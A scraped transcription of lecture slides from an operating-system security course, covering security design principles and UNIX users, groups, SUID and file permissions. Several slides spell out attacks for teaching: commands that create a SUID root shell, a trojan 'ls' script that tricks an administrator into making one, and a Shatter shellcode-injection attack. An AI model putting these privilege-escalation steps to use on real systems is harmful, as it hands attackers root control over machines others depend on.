INSE 6130 Operating System Security

Similar documents
INSE 6130 Operating System Security. Overview of Design Principles

Outline. UNIX security ideas Users and groups File protection Setting temporary privileges. Examples. Permission bits Program language components

Introduction to Computer Security

User Management. René Serral-Gracià Xavier Martorell-Bofill 1. May 26, Universitat Politècnica de Catalunya (UPC)

Files (review) and Regular Expressions. Todd Kelley CST8207 Todd Kelley 1

Operating Systems Linux 1-2 Measurements Background material

Privileges: who can control what

5/8/2012. Encryption-based Protection. Protection based on Access Permission (Contd) File Security, Setting and Using Permissions Chapter 9

bash startup files Linux/Unix files stty Todd Kelley CST8207 Todd Kelley 1

Introduction to Security

Processes are subjects.

CST8207: GNU/Linux Operating Systems I Lab Six Linux File System Permissions. Linux File System Permissions (modes) - Part 1

Introduction to Security

Data Security and Privacy. Unix Discretionary Access Control

UNIX File Hierarchy: Structure and Commands

Case Study: Access Control. Steven M. Bellovin October 4,

Processes are subjects.

CS 392/681 - Computer Security. Module 5 Access Control: Concepts and Mechanisms

Operating Systems. Engr. Abdul-Rahman Mahmood MS, PMP, MCP, QMR(ISO9001:2000) alphapeeler.sf.net/pubkeys/pkey.htm

Introduction to Unix May 24, 2008

Chapter 8: Security under Linux

Case Studies in Access Control

Everything about Linux User- and Filemanagement

Hardware. Ahmet Burak Can Hacettepe University. Operating system. Applications programs. Users

CSE 565 Computer Security Fall 2018

find Command as Admin Security Tool

Introduction to Systems Security

Operating System Security

Programming Project # 2. cs155 Due 5/5/05, 11:59 pm Elizabeth Stinson (Some material from Priyank Patel)

INTRODUCTION TO LINUX

CS 392/681 - Computer Security. Module 6 Access Control: Concepts and Mechanisms

Basic File Attributes

Operating system security

Hands-on Keyboard: Cyber Experiments for Strategists and Policy Makers

Exercise Sheet 2. (Classifications of Operating Systems)

Files and Directories

6.858 Lecture 4 OKWS. Today's lecture: How to build a secure web server on Unix. The design of our lab web server, zookws, is inspired by OKWS.

User Commands ls ( 1 )

Securing Unix Filesystems - When Good Permissions Go Bad

CSE 390a Lecture 3. Multi-user systems; remote login; editors; users/groups; permissions

Chapter Two. Lesson A. Objectives. Exploring the UNIX File System and File Security. Understanding Files and Directories

Security Architecture

Operating Systems. Copyleft 2005, Binnur Kurt

IS 2150 / TEL 2810 Information Security and Privacy

Capability and System Hardening

Operating Systems 3. Operating Systems. Content. What is an Operating System? What is an Operating System? Resource Abstraction and Sharing

Find out where you currently are in the path Change directories to be at the root of your home directory (/home/username) cd ~

CSE 265: System and Network Administration

cs642 /operating system security computer security adam everspaugh

User Commands chmod ( 1 )

Working with Basic Linux. Daniel Balagué

CIS 5373 Systems Security

User accounts and authorization

CST8207: GNU/Linux Operating Systems I Lab Seven Linux User and Group Management. Linux User and Group Management

INF322 Operating Systems

UNIT V. Dr.T.Logeswari. Unix Shell Programming - Forouzan

Information Security CS 526

Basic File Attributes

Information System Audit Engr. Abdul-Rahman Mahmood MS, PMP, MCP, QMR(ISO9001:2000)

Answers to Even- Numbered Exercises

User Accounts. The Passwd, Group, and Shadow Files

CS197U: A Hands on Introduction to Unix

Lab Authentication, Authorization, and Accounting

PESIT Bangalore South Campus

Overview LEARN. History of Linux Linux Architecture Linux File System Linux Access Linux Commands File Permission Editors Conclusion and Questions

Race Condition Vulnerability Lab

LAB #7 Linux Tutorial

CS 200. User IDs, Passwords, Permissions & Groups. User IDs, Passwords, Permissions & Groups. CS 200 Spring 2017

Course 144 Supplementary Materials. UNIX Fundamentals

Access Control. CMPSC Spring 2012 Introduction Computer and Network Security Professor Jaeger.

Permissions and Links

File Properties and Permissions

CS/CIS 249 SP18 - Intro to Information Security

CS246 Spring14 Programming Paradigm Notes on Linux

lsx [ls_options ] [names]

Operating Systems, Unix Files and Commands SEEM

Explicit Information Flow in the HiStar OS. Nickolai Zeldovich, Silas Boyd-Wickizer, Eddie Kohler, David Mazières

Keys and Passwords. Steven M. Bellovin October 17,

Information System Audit Engr. Abdul-Rahman Mahmood MS, PMP, MCP, QMR(ISO9001:2000)

Secure Architecture Principles

TECH 4272 Operating Systems

CptS 360 (System Programming) Unit 6: Files and Directories

CSE 390a Lecture 4. Persistent shell settings; users/groups; permissions

Introduction to Computer Security

CS631 - Advanced Programming in the UNIX Environment

The landscape. File hierarchy overview. A tree structure of directories The directory tree is standardized. But varies slightly among distributions

System Programming. Introduction to Unix

UNIX/Linux Auditing. Baccam Consulting, LLC Training Events

Filesystem Hierarchy and Permissions

Introduction to Linux

CSE 390a Lecture 4. Persistent shell settings; users/groups; permissions

User & Group Administration

Commands are in black

5/8/2012. Creating and Changing Directories Chapter 7

read: permitted to read the contents of directory ( view files and sub-directories in that directory ).

Secure Architecture Principles

CIS Operating Systems File Systems Security. Professor Qiang Zeng Fall 2017

Introduction. Let s start with the first set of slides

MANAGING THE NONUNIFORM BEHAVIOUR OF TERMINALS AND KEYBOARDS. : WHEN THINGS GO WRONG

Unix Basics. UNIX Introduction. Lecture 14

Transcription:

INSE 6130 Operating System Security Design Principles Prof. Lingyu Wang 1 1

Overview of Design Principles Design principles Time-proven guidelines For implementing security mechanisms/systems Rooted in simplicity and restriction Simplicity Less to go wrong; easier to check and use Restriction Information and privileges il 2 2

Overview of Design Principles Least Privilege Fail-Safe Defaults Economy of Mechanism Complete Mediation Open Design Separation of Privilege Least Common Mechanism Psychological Acceptability 3 3

Principle of Least Privilege A subject should be given only those information/ privileges necessary to complete its task What rights to be given, when to give/revoke Difficulties: Require fine-grained access control Lack in standard UNIX security Principle does not apply to root (UNIX) and administrator (NT) The presence of root/administrator makes hacking a lot easier RBAC/TE can help to remove such difficulties 4 4

Principle of Least Privilege (Example) Facts about Windows architecture/messaging No restrictions on kernel mode processes Some interactive i services run in kernel mode Any application can send messages to those services Shatter Network Associates VirusScan v4.5.1 console running on Windows 2000 Professional as LocalSystem As guest, find an edit box within the console (get the handle, remove the limit) and paste shell codes into it Send the window a WM_TIMER message with second parameter being the address of our shell codes You get a shell running as LocalSystem http://web.archive.org/web/20060115174629/http://security.tombom.co.uk/shatter.html 5 5

Principle of Fail-Safe Defaults Default action is to deny access, unless access privileges are granted explicitly to a subject Closed World If action fails, it should undo the actions before it terminates Help to tolerate mistakes/faults Example: SunOS shipped with + in /etc/hosts.equiv 6 6

Economy of Mechanism (K.I.S.S.) Keep security mechanisms as simple as possible Simpler design has less to go wrong, is easier to understand, follow, and manage On the contrary, complex mechanisms make more assumptions, which may not hold Example: two-step user input verification Everything should be made as simple as possible, but no simpler - Albert Einstein 7 7

Complete Mediation Check every access don t cache or rely on previous permissions The reason for relaxing this one is efficiency Example: Race Condition/TOCTTOU bug if (access(file, R_ OK)!= 0) { } exit(1); fd = open(file, O_RDONLY); // do something with fd... point file to another file 8 8

Open Design Security should not depend on secrecy of design or implementation Don t depend on the ignorance of the user - Security through obscurity Question: but hiding source code does seem to make attacks harder? Example: RC4, DES, 9 9

Separation of Privilege/Duty Require multiple conditions/subjects to grant privilege Example: the big red nuclear button Example: TA/student Example: in certain Unix, a user is allowed to change from his account to root if (1) he knows the root password, (2) the user is in the wheel group (GID = 0) 10 10

Least Common Mechanism Mechanisms/resources should not be shared Shared resources provide a channel along which information can flow Example: covert channels Two processes are prohibited from communicating with each other Percent of CPU used. To send a 1 bit, the first process uses 100% of the CPU; to send a 0 bit, it uses 0% of the CPU (i.e., idle) The other process sees how much of the CPU it can get 11 11

Psychological Acceptability Security mechanisms should not add to the difficulty of accessing resource Hide complexity introduced by security mechanisms Otherwise users will try to get around - problem Example: SSH, SSL 12 12

INSE 6130 Operating System Security UNIX Security Prof. Lingyu Wang 13 13

Overview User and Group File System 14 14

UID (user ID) UNIX represents each user by a UID A 16-bit integer, from 0 to 65535 All UNIX privileges are determined by the UID (sometimes the GID), not by user name Linux Theoretically, a root whose UID is not 0 is not a root; any user whose UID is 0 is a root UIDs between 0 and 499 are reserved for system functions E.g., root, daemon, uucp, mail, news Normal users UID start from 500, automatically assigned, but can be changed by root 15 15

/etc/passwd The mapping between usernames and UIDs is in the file /etc/passwd, e.g., root:x:0:0:root:/root:/bin/bash 0 t t /bi /b bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync foo:x:500:500:mr. Foo:/home/foo:/bin/bash username:x:uid:gid:full name:home dir:shell A critical file in terms of security UID=0 16 16

Users and Groups Every UNIX user belongs to one or more groups Each group also has a name and a GID GID values are also historically 16-bit integers Linux Private group: GID=CID (except some system users) Admins can create additional groups for easy access control E.g., project group A user can belong to multiple groups, but only one primary group (GID in /etc/passwd) 17 17

/etc/group Like /etc/passwd, but for groups root:x:0:root bin:x:1:root,bin,daemon daemon:x:2:root,bin,daemon sys:x:3:root,bin,adm adm:x:4:root,adm,daemon wheel:x:10:root,anne,chris,daniel,spanner,wojciech mail:x:12:mail foo:x:500:foo wheel group includes all admins Another critical file in terms of security wheel 18 18

Change Group You can switch to a group using newgrp Of which you are a member Effective until exit 19 19

The Superuser A special user in /etc/passwd with UID of 0, typically (but not necessarily) with the username root The superuser exerts nearly complete control over the OS Security restrictions, checks/warnings are bypassed for any program run by this user Stealing the root is the ultimate t goal of attackers 20 20

The Superuser (Cont d) The superuser account is not for casual use A violation of the least privilege principle Main security threat rm rf * Switch to root only when necessary using the command su (switch user) 21 21

Real and effective UIDs Real UID of a process UID of the user who spawns the process UID of the su ed user who spawns the process Effective UID Special SUID (explained later) process takes owner s UID E.g., root owns passwd, and only root can run passwd Each user needs to change his/her own password Set passwd as an SUID file 22 22

Set UID (SUID) Unprivileged users sometimes need to run tasks using superuser privileges passwd requires modifying /etc/passwd file root only How can a normal user changes own password? Run w/ the privilege of the owner of that program Non-SUID program: UID=UID of the user who runs it SUID program: Effective UID = owner s UID 23 23

Problems with SUID If you leave your terminal unattended, a malicious passerby can create a SUID shell % cp /bin/sh /tmp/suid-root-shell shell % chmod 4755 /tmp/ suid-root-shell suid-root-shell will run as root, no matter who runs it Find all SUID/SGID files: # find / \(-perm -004000-o -perm -002000 \) -type f -print Starts in the root directory (/) and looks for all files that match mode 002000 (SGID) or mode 004000 (SUID) The -type f option causes the search to be restricted to files The -print option causes the name of every matching file to be printed 24 24

Turning Off SUID While Mounting You don t want A user to mount a floppy disk containing SUID shell Mount a network file system with SUID shells You can turn off the SUID bit by specifying the nosuid option with the mount command To mount the file system athena in the /usr/athena directory on the host zeus: # /etc/mount -o nosuid zeus:/athena /usr/athena 25 25

Stealing Superuser! A wants root access from system admin B. A noticed that B had. at the beginning g of his search path B can set this by: PATH=.:$PATH A created an executable shell file named ls in the current directory: #!/bin/sh (#! indicates this is a shell script) cp /bin/sh./stuff/junk/.superdude (copy the shell) chmod 4555./stuff/junk/.superdude (SUID) rm -f $0 (delete this file) exec /bin/ls/l ${1+"$@"} (run the real ls) 26 26

Stealing Superuser! (Cont d) A then executed the following commands: % cd % chmod 700. (so B can t list unless as root) % touch./-f (so rm -f does not work) A approached B, "I have a funny file in my directory I can't seem to delete." B su to root, and goto A s directory, run ls He actually run the script ls A has created This creates a SUID shell that runs as root (no matter who runs it) 27 27

Restricting su On some versions of UNIX require users to be in the group wheel (GID=0) in order to su to root The /etc/group entry for wheel must be non-empty Some versions of su prompt users for their own passwords instead of root s No need to give out the superuser's password (simply put that user into the wheel group) Some versions of UNIX require that users specifically be given permission to su Like sudo (/etc/sudoers) 28 28

Overview User and Group File System 29 29

UNIX Directory Hierarchy For more details refer to: http://www.pathname.com/fhs/pub/fhs-2.3.html 30 30

The UNIX File System In UNIX, everything is a "file" including processes and network connections Directory contains file name, inode number Multiple file names can have the same inode number (links) The inode number points to an inode that contains all attributes (size, time modified, rights, etc.) except name of the file 31 31

The UNIX File System (Cont d) 32 32

I-node Details Each inode generally contains: The location of the item's contents on the disk, if any The item's type (e.g., file, directory, symbolic link) The item's size, in bytes, if applicable The time the file's inode was last modified (the ctime) The time the file's contents were last modified (the mtime) The time the file was last accessed (the atime) for read ( ), exec ( ), etc A reference count: the number of names the file has The file's owner (a UID) The file's group (a GID) The file's mode bits (also called file permissions or permission bits) 33 33

File Permissions File Type Contents t Meaning - Plain file d Directory c Character device (tty or printer) b Block device (usually disk or CD-ROM) l s Symbolic link (BSD or V.4) Socket (BSD or V.4) 34 34

Change File Permission Only owner or superuser can change chmod [-Rf] [agou][+-=][rwxst] filelist -R: recursively -f:no error reporting Whose privileges? Letter a g o u Meaning Modifies privileges for all users Modifies group privileges Modifies others' privileges Modifies the owner's privileges How to change the privileges? Symbol Meaning + Adds to the current privilege - Removes from the current privilege = Replaces the current privilege 35 35

Change File Permission Only owner or superuser can change chmod [-Rf] ][agou][+-=][rwxst] ] filelist Which privileges? Symbol Meaning r read w write x execution s SUID or SGID t sticky bit 36 36

chmod Relative Mode Add/remove a permission Everybody y in Sian s group has write permission: % ls -l notes -rw-r--r-- 1 sian biochem 4320 Feb 9 13:20 notes % chmod g+w notes % ls -l notes -rw-rw-r-- 1 sian biochem 4320 Feb 9 13:20 notes People not in her group can't readit: % chmod o-r notes % ls -l notes -rw-rw---- 1 sian biochem 4320 Feb 9 13:20 notes 37 37

chmod Absolute Mode Specify new permissions w/ four-digit octal number For example, "-rwxr-x---" is 0750: 0400 Read by owner 0200 Write by owner 0100 Execute by owner 0040 Read by group 0010 Execute by group 0750 Result 0654 is: 6=4+2 read,write by owner 5=4+1 read/execute by group 4 read by other -rw-r-xr-- Octal Number Permission 4000 SUID 2000 SGID 1000 "Sticky bit" 0400 Read by owner 0200 Wit Write by owner 0100 Execute by owner 0040 Read by group 0020 Write by group 0010 Execute by group 38 38

Octal Number File Common Permission Settings Permission 0755 /bin/ls Anybody ycan copy or run the program; the file's owner can modify it 0711 $HOME A user's home directory; no other users on the system can display its contents, but can access files or subdirectories contained within the directory if they know the names of the files or directories 0700 $HOME Locks a user'ss home directory so that no other users on the system can access its contents, or the contents of any subdirectory 0600 /usr/mail/$user The user can read or write the contents of the mailbox, but no other users (except the superuser) may access it 0644 any file The file's owner can read or modify the file; everybody else can only read it 0664 groupfile The file's owner or anybody in the group can modify the file; everybody else can only read it 0666 writable Anybody ycan read or modify the file 0444 readable Anybody can read the file; only the superuser can modify it without changing the permissions 39 39

INSE 6130 Operating System Security Review Sample Questions, Q&A for Midterm Prof. Lingyu Wang 40 40

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback